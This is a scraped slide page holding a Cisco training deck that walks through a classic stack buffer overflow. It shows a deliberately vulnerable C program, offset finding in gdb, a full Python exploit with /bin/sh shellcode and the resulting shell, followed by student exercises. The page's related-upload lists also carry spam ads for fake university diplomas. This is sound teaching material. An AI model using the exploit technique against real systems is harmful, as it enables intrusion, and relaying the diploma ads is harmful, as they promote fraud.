UNIT-I-METAL CASTING PROCESSES -Manufact
Mr.C.Dineshbabu
 
AI INTERACTION WITH HUMAN IN DAILY LIFE (1).pptx
AI INTERACTION WITH HUMAN IN DAILY LIFE (1).pptxAI INTERACTION WITH HUMAN IN DAILY LIFE (1).pptx
AI INTERACTION WITH HUMAN IN DAILY LIFE (1).pptx
MoinKhan447017
 
Reciprocating Air Compressor and its Types
Reciprocating Air Compressor and its TypesReciprocating Air Compressor and its Types
Reciprocating Air Compressor and its Types
Atif Razi
 
Youtube Transcript Sumariser- application of API
Youtube Transcript Sumariser- application of APIYoutube Transcript Sumariser- application of API
Youtube Transcript Sumariser- application of API
AnamikaRani12
 
一比一原版(ucberkeley毕业证书)加州大学伯克利分校毕业证如何办理
一比一原版(ucberkeley毕业证书)加州大学伯克利分校毕业证如何办理一比一原版(ucberkeley毕业证书)加州大学伯克利分校毕业证如何办理
一比一原版(ucberkeley毕业证书)加州大学伯克利分校毕业证如何办理
b1k7zip
 
How Cash App Trains Large Language Models For Customer Support
How Cash App Trains Large Language Models For Customer SupportHow Cash App Trains Large Language Models For Customer Support
How Cash App Trains Large Language Models For Customer Support
Dean Wyatte
 
Sea Wave Energy - Renewable Energy Resources
Sea Wave Energy - Renewable Energy ResourcesSea Wave Energy - Renewable Energy Resources
Sea Wave Energy - Renewable Energy Resources
21h16charis
 
RAILWAYS, a vital part of our infrastructure, play a crucial role in ensuring...
RAILWAYS, a vital part of our infrastructure, play a crucial role in ensuring...RAILWAYS, a vital part of our infrastructure, play a crucial role in ensuring...
RAILWAYS, a vital part of our infrastructure, play a crucial role in ensuring...
Kiran Kumar Manigam
 
Thermodynamics and Heat Transfer - KRCE.pptx
Thermodynamics and Heat Transfer - KRCE.pptxThermodynamics and Heat Transfer - KRCE.pptx
Thermodynamics and Heat Transfer - KRCE.pptx
krceseo
 
355536825-03-Oil-Gas-Flow-Metering-System-pptx.pptx
355536825-03-Oil-Gas-Flow-Metering-System-pptx.pptx355536825-03-Oil-Gas-Flow-Metering-System-pptx.pptx
355536825-03-Oil-Gas-Flow-Metering-System-pptx.pptx
Le Hoang Phong
 
Thesis on Assessment of Landslide Prone Area and Their Consequences Due to C...
Thesis on Assessment of Landslide Prone Area and Their Consequences Due to C...Thesis on Assessment of Landslide Prone Area and Their Consequences Due to C...
Thesis on Assessment of Landslide Prone Area and Their Consequences Due to C...
ErBamBhandari
 
A Case of Unrecognized Peripartum Cardiomyopathy Which Was Noticed During Eme...
A Case of Unrecognized Peripartum Cardiomyopathy Which Was Noticed During Eme...A Case of Unrecognized Peripartum Cardiomyopathy Which Was Noticed During Eme...
A Case of Unrecognized Peripartum Cardiomyopathy Which Was Noticed During Eme...
CrimsonPublishers-SBB
 

Recently uploaded (20)

How BIM Modeling Services Revolutionize Architecture and Design.pdf
How BIM Modeling Services Revolutionize Architecture and Design.pdfHow BIM Modeling Services Revolutionize Architecture and Design.pdf
How BIM Modeling Services Revolutionize Architecture and Design.pdf
 
2300/2800 series Perkins diesel engine.pdf
2300/2800 series Perkins diesel engine.pdf2300/2800 series Perkins diesel engine.pdf
2300/2800 series Perkins diesel engine.pdf
 
Electrical and Electronics engineering power point presentation.
Electrical and Electronics engineering power point presentation.Electrical and Electronics engineering power point presentation.
Electrical and Electronics engineering power point presentation.
 
Fuel-Dlivery-Project PowerPoint presentations
Fuel-Dlivery-Project PowerPoint presentationsFuel-Dlivery-Project PowerPoint presentations
Fuel-Dlivery-Project PowerPoint presentations
 
Three Phase Induction Motors, Equivalent Circuits
Three Phase Induction Motors, Equivalent CircuitsThree Phase Induction Motors, Equivalent Circuits
Three Phase Induction Motors, Equivalent Circuits
 
Presentation on ergonomics in mining industry
Presentation on ergonomics in mining industryPresentation on ergonomics in mining industry
Presentation on ergonomics in mining industry
 
PCI Design Handbook Content and Updates.pptx
PCI Design Handbook Content and Updates.pptxPCI Design Handbook Content and Updates.pptx
PCI Design Handbook Content and Updates.pptx
 
一比一原版(uofs毕业证书)萨省大学毕业证如何办理
一比一原版(uofs毕业证书)萨省大学毕业证如何办理一比一原版(uofs毕业证书)萨省大学毕业证如何办理
一比一原版(uofs毕业证书)萨省大学毕业证如何办理
 
UNIT-I-METAL CASTING PROCESSES -Manufact
UNIT-I-METAL CASTING PROCESSES -ManufactUNIT-I-METAL CASTING PROCESSES -Manufact
UNIT-I-METAL CASTING PROCESSES -Manufact
 
AI INTERACTION WITH HUMAN IN DAILY LIFE (1).pptx
AI INTERACTION WITH HUMAN IN DAILY LIFE (1).pptxAI INTERACTION WITH HUMAN IN DAILY LIFE (1).pptx
AI INTERACTION WITH HUMAN IN DAILY LIFE (1).pptx
 
Reciprocating Air Compressor and its Types
Reciprocating Air Compressor and its TypesReciprocating Air Compressor and its Types
Reciprocating Air Compressor and its Types
 
Youtube Transcript Sumariser- application of API
Youtube Transcript Sumariser- application of APIYoutube Transcript Sumariser- application of API
Youtube Transcript Sumariser- application of API
 
一比一原版(ucberkeley毕业证书)加州大学伯克利分校毕业证如何办理
一比一原版(ucberkeley毕业证书)加州大学伯克利分校毕业证如何办理一比一原版(ucberkeley毕业证书)加州大学伯克利分校毕业证如何办理
一比一原版(ucberkeley毕业证书)加州大学伯克利分校毕业证如何办理
 
How Cash App Trains Large Language Models For Customer Support
How Cash App Trains Large Language Models For Customer SupportHow Cash App Trains Large Language Models For Customer Support
How Cash App Trains Large Language Models For Customer Support
 
Sea Wave Energy - Renewable Energy Resources
Sea Wave Energy - Renewable Energy ResourcesSea Wave Energy - Renewable Energy Resources
Sea Wave Energy - Renewable Energy Resources
 
RAILWAYS, a vital part of our infrastructure, play a crucial role in ensuring...
RAILWAYS, a vital part of our infrastructure, play a crucial role in ensuring...RAILWAYS, a vital part of our infrastructure, play a crucial role in ensuring...
RAILWAYS, a vital part of our infrastructure, play a crucial role in ensuring...
 
Thermodynamics and Heat Transfer - KRCE.pptx
Thermodynamics and Heat Transfer - KRCE.pptxThermodynamics and Heat Transfer - KRCE.pptx
Thermodynamics and Heat Transfer - KRCE.pptx
 
355536825-03-Oil-Gas-Flow-Metering-System-pptx.pptx
355536825-03-Oil-Gas-Flow-Metering-System-pptx.pptx355536825-03-Oil-Gas-Flow-Metering-System-pptx.pptx
355536825-03-Oil-Gas-Flow-Metering-System-pptx.pptx
 
Thesis on Assessment of Landslide Prone Area and Their Consequences Due to C...
Thesis on Assessment of Landslide Prone Area and Their Consequences Due to C...Thesis on Assessment of Landslide Prone Area and Their Consequences Due to C...
Thesis on Assessment of Landslide Prone Area and Their Consequences Due to C...
 
A Case of Unrecognized Peripartum Cardiomyopathy Which Was Noticed During Eme...
A Case of Unrecognized Peripartum Cardiomyopathy Which Was Noticed During Eme...A Case of Unrecognized Peripartum Cardiomyopathy Which Was Noticed During Eme...
A Case of Unrecognized Peripartum Cardiomyopathy Which Was Noticed During Eme...
 

03 - Refresher on buffer overflow in the old days

  • 1. Thank you Aleph One! Refresher on buffer overflow in the old days Alex Moneger Security Engineer
  • 2. Buffer overflow refresher  First paper by Aleph One in 1996 in Phrack #49: http://www.phrack.org/issues.html?issue=49&id=14  No OS level protections at the time  Works by writing past the buffer end aka stuff more data into a buffer then it can hold  Goal is to overwrite something interesting control structure with our attacker data. Can de saved EIP, but can be any function pointer © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 2
  • 3. Stack refresher (again ;))  Stack holds local variables, the address of the previous frame, the address of where to return to  Goal is to overwrite Saved EIP (referred to as SEIP)  If we control SEIP, we control where “ret” instruction will go, meaning we control EIP SEIP SEBP Local function storage © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 3
  • 4. The “classic” cisco@kali:~/src/seccon/ch3$ pygmentize -g ch3.c #include <string.h> int vuln(char *stuff) { char buf[0x64] = {0}; strcpy(buf, stuff); return 1; } int main(int argc, char **argv) { vuln(argv[1]); return 0; }  “Buf” has no boundary checking. “stuff” is attacker controlled SEIP SEBP Buf © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 4
  • 5. Making it exploitable  Previous program compiled with following options: cisco@kali:~/src/seccon/ch3$ sudo sysctl -a | grep randomize kernel.randomize_va_space = 0 cisco@kali:~/src/seccon/ch3$ cc ch3.c -fno-stack-protector -z execstack -U_FORTIFY_SOURCE –g -o ch3  See how many security features we are disabling?  Pretend we don’t have sources, find the size of the local stack storage in function prologue cisco@kali:~/src/seccon/ch3$ objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 10 | grep --color esp 804841d: 89 e5 mov ebp,esp 8048421: 83 c4 80 add esp,0xffffff80 cisco@kali:~/src/seccon/ch3$ python -c 'import exutil as e; print e.cmp2(0xffffff80)' -128 © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 5
  • 6. Recon  Local storage for func is 128 bytes. Nothing says that our vulnerable buf starts at the beginning of that  Let’s figure out how much we need to overwrite to control EIP  Max overwrite size = ebp – esp + SEBP + SEIP = 128 + 4 + 4 = 136 SEIP SEBP ???? Buf ???? 1 2 8 © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 6
  • 7. Finding the offsets manually cisco@kali:~/src/seccon/ch3$ python -c 'print "A =>", hex(ord("A")), "B =>", hex(ord("B"))' A => 0x41 B => 0x42 cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*132+"B"*4')) || dmesg | tail -n 1 Segmentation fault [613635.624345] ch3[18312]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*128+"B"*4')) || dmesg | tail -n 1 Segmentation fault [613642.976497] ch3[18318]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*124+"B"*4')) || dmesg | tail -n 1 Segmentation fault [613663.605595] ch3[18325]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 cisco@kali:~/src/seccon/ch3$ # Continue decrementing by 4 cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*112+"B"*4')) || dmesg | tail -n 1 Segmentation fault [613678.429167] ch3[18331]: segfault at 42424242 ip 42424242 sp bffffd00 error 14  Doing this properly => Use msf pattern_create.rb & pattern_offset.rb © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 7
  • 8. We’re going to overflow!!! 1. Choose a shellcode 2. Compute it’s length: ie: 40 bytes 3. Add the proper padding to overwrite SEIP: 112 - 40 = 72 4. Find the address of our shellcode 5. Append to the buffer to redirect flow Shellcode Junk SC Add ress © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 8
  • 9. Finding buffer address cisco@kali:~/src/seccon/ch3$ env -i gdb --quiet --args ./ch3 $(python -c 'print "A"*112+"BCDE"') Reading symbols from /home/cisco/src/seccon/ch3/ch3...done. gdb$ gdb$ !objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 22 | tail -n 5 804844e: 83 ec 80 sub esp,0xffffff80 8048451: 5b pop ebx 8048452: 5f pop edi 8048453: 5d pop ebp 8048454: c3 ret gdb$ gdb$ break *0x804844e Breakpoint 1 at 0x804844e: file ch3.c, line 9. gdb$ r gdb$ x/16w $esp 0xbffffc70: 0xbffffc8c 0xbffffec9 0xb7ffeff4 0xbffffd70 0xbffffc80: 0xb7fffac0 0xbffffd44 0xb7feb662 0x41414141 0xbffffc90: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffca0: 0x41414141 0x41414141 0x41414141 0x41414141 gdb$ x/x 0xbffffc8c 0xbffffc8c: 0x41414141 gdb$ x/s 0xbffffc8c 0xbffffc8c: 'A' <repeats 112 times>, "BBBB" gdb$ x/2w $ebp 0xbffffcf8: 0x41414141 0x42424242 gdb$ si 5 --------------------------------------------------------------------------[regs] EAX: 00000001 EBX: 41414141 ECX: 00000000 EDX: 00000075 o d I t S z a P C ESI: 00000000 EDI: 41414141 EBP: 41414141 ESP: BFFFFD00 EIP: 42424242 CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop: Cannot access memory at address 0x42424242 0x42424242 in ?? () © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 9
  • 10. Summary  We have the overflow length: 116 bytes (112 bytes + 4 bytes SEIP overwrite)  We have the buffer’s address (0xbffffc8c)  We have a shellcode (I’m a nice guy)  Stuff all of it together © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 10
  • 11. Shell time cisco@kali:~/src/seccon/ch3$ pygmentize ch3.py #!/usr/bin/env python # -*- coding: utf-8 -*- import os import struct target = "ch3" overflow_len = 112 ret_addr = 0xbffffc8c target_path = os.path.abspath(target) # setreuid(geteuid(),geteuid()); execve("/bin/sh",0,0) sc = ("x6ax31x58x99xcdx80x89xc3x89xc1x6ax46" "x58xcdx80xb0x0bx52x68x6ex2fx73x68x68" "x2fx2fx62x69x89xe3x89xd1xcdx80") nop_sled = overflow_len - len(sc) sc_addr = struct.pack("<I", ret_addr) ex = "%s%s%s" % (sc, 'A'*nop_sled, sc_addr) os.execve(target_path, (target_path, ex), os.environ) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 11
  • 12. Result cisco@kali:~/src/seccon/ch3$ invoke ch3.py $ id uid=1000(cisco) gid=1001(cisco) groups=1001(cisco) $ exit cisco@kali:~/src/seccon/ch3$ © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 12
  • 13. Variations  Small buffers (shellcode doesn’t fit): append shellcode after ret address SC Add ress Junk Shellcode  Unpredictable buffer address (stack size is not under control): append NOP sled in front of shellcode: NOP sled Shellcode SC Add ress  Use an environment variable to host your shellcode © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 13
  • 14. Limitations  Shellcode on executed on the stack, so stack needs to be executable  Buffer address is known, so addresses can’t be randomized  Stack frame is not protected (more on this later)  There are no null bytes in our buffer address (This can fixed easily) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 14
  • 15. Now get to work  Compile and exploit ch3  Try any different exploitation technique described previously  Don’t use the “invoke” script when trying to exploit. What is happening to the stack? Why is your exploit failing?  Enable one memory protection (whichever). Check the effect on the exploit © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 15